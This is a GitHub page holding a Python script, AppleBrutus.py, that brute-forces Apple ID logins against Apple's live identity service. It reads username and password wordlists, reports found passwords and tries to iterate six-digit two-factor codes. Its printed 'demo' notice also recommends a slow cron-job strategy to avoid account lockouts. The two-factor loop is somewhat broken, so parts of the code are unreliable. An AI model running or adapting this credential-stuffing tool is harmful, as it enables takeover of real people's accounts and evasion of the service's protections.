Skip to content Pull requests Issues Marketplace Explore @Balverinecmr userlandkernel / HVA Public Code Issues Pull requests Actions Projects Wiki Security Insights HVA/OPRG/AppleBrutus.py / @userlandkernel userlandkernel Create AppleBrutus.py Latest commit c6a5d46 on Oct 1, 2020 History 1 contributor 164 lines (131 sloc) 5.12 KB #!/usr/bin/env python3 # Written by Sem Voigtlander (@userlandkernel) # Licensed under the MIT License # Apple if you are monitoring this, please add anti-bot verification to your identity service provider (eg: captcha!) import os import sys import argparse import requests import time import datetime from bs4 import BeautifulSoup as Soup class AppleBrutus: def __init__(self): self.tstart = datetime.datetime.now() # Session to keep cookies etc self.s = requests.Session() # Identity Service provider self.ids = "https://idmsa.apple.com/IDMSWebAuth/login?appIdKey=bbddf091a7ff4178d2deda57c73e701096e4cd4b7f97545ed8703b3c46f38461&baseURL=https://portal.apple.com/&path=validateUser%3Faction%3Dlogin%26appId%3D1468%26requestUri" def attempt(self, environ="PROD", appleid=None, password=None): # Retrieve the login page content loginpage = self.s.get(self.ids, allow_redirects=True) # If the status isn't HTTP_OK something must be wrong with the application if loginpage.status_code != 200: raise BaseException("Login page returned error") # Find the login soup = Soup(loginpage.text, "html.parser") form = soup.find("form", {"name":"form2"}) # Login form is named form2 # Automatically retrieve fields and set post data for requests formdata = dict() for element in form.find_all("input"): try: formdata[element["name"]] = element["value"] except Exception as exc: pass # Set the username and password if not appleid: appleid = str(input("APPLE ID: ")) if not password: password = str(input("PASSWORD: ")) formdata["appleId"] = appleid formdata["accountPassword"] = password # Apparently you can log into dev account formdata["ENV"] = environ # Authenticate with Apple print("[{}]: TRYING {}...".format(appleid, password)) authres = self.s.post("https://idmsa.apple.com/IDMSWebAuth/authenticate", data=formdata, allow_redirects=True) # Check if login failed if "Your account information was entered incorrectly" in authres.text: print("WRONG PASSWORD") return 1 elif "Your Apple ID or password was entered incorrectly" in authres.text: print("ACCOUNT DOES NOT EXIST") return 2 # Check if 2FA code is required elif "Verify your identity" in authres.text: print("PASSWORD FOUND: {}".format(password)) print("TWO FACTOR") # Find form for 2FA code soup = Soup(authres.text, "html.parser") twofactor = soup.find("form", {"id":"command"}) # 2FA code form has HTML id 'command' # Brute force the digits for i in range(0, 1000000): code = str(i) # Cast to string so we can add prefix of zeroes if needed # Add prefix if needed while len(code) < 6: code = "0"+code # Set value of the digit input fields to corresponding digit from bruteforce for n in range(0, 5): formdata['digit'+str(i+1)] = code[n] print("Trying {}".format(code), end=": ") # Try 2-FA code twofalogin = self.s.post("https://idmsa.apple.com/IDMSWebAuth/"+twofactor['action'], data=formdata, allow_redirects=True) if "Unauthorized access detected" in twofalogin.text: print("UNAUTHORIZED ACCESS DETECTED") break # Just give up, they caught us else: break #print(twofalogin.text) elif "This Apple ID has been locked for security reasons" in authres.text: print("APPLE ID BLOCKED :(") return 2 else: print(authres.text) print("SUCCESS") return 0 def brute(self, userfile=None, passfile=None): users = None passwords = None if userfile: users = open(userfile, 'r', errors='replace').read().splitlines() if passfile: passwords = open(passfile, 'r', errors='replace').read().splitlines() # Bruteforce if users and passwords: for user in users: if user == "": continue for password in passwords: r = self.attempt(appleid=user, password=password) if r == 2: print("Skipping {}".format(user)) break # Just regular login else: self.attempt() print("") print("BRUTEFORCE COMPLETED IN: {} seconds".format(int((datetime.datetime.now() - self.tstart).total_seconds()))) print("") if __name__ == "__main__": # Parse arguments parser = argparse.ArgumentParser() parser.add_argument('userlist', help='Path to wordlist containing usernames to test', nargs='?') parser.add_argument('passlist', help='Path to wordlist containing passwords to test e.g: rockyou.txt', nargs='?') args = parser.parse_args() # Initialize brute forcer brutus = AppleBrutus() print("NOTICE:") print("THIS PROGRAM IS NOT INTENDED FOR HARMFUL PURPOSES AND IS WRITTEN TO DEMO HOW TO CONDUCT A BRUTEFORCE ATTACK") print("TRYING MILLIONS OF PASSWORDS LEADS TO BLOCKING THE ACCOUNT") print("") print("RECOMMENDED STRATEGY: CRON JOB RUNNING EACH FEW HOURS TO TRY FEW PASSWORDS EVERY DAY PER ACCOUNT") print("ONLINE ATTACKS OFTEN REQUIRE THIS APPROACH!!!") print("") print("APPLE ACCOUNTS MAY BE ROTECTED WITH 2FA") print("THE SCRIPT SUPPORTS 2FA BRUTEFORCE BUT IT IS NOT EFFECTIVE, FOR DEMO ONLY") print("") print("TIM COOK, IF U READ THIS: PLEASE ADD CAPTCHA!!!") print("") print("Initiating bruteforce............") # Conduct bruteforce brutus.brute(userfile=args.userlist, passfile=args.passlist) © 2022 GitHub, Inc. Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About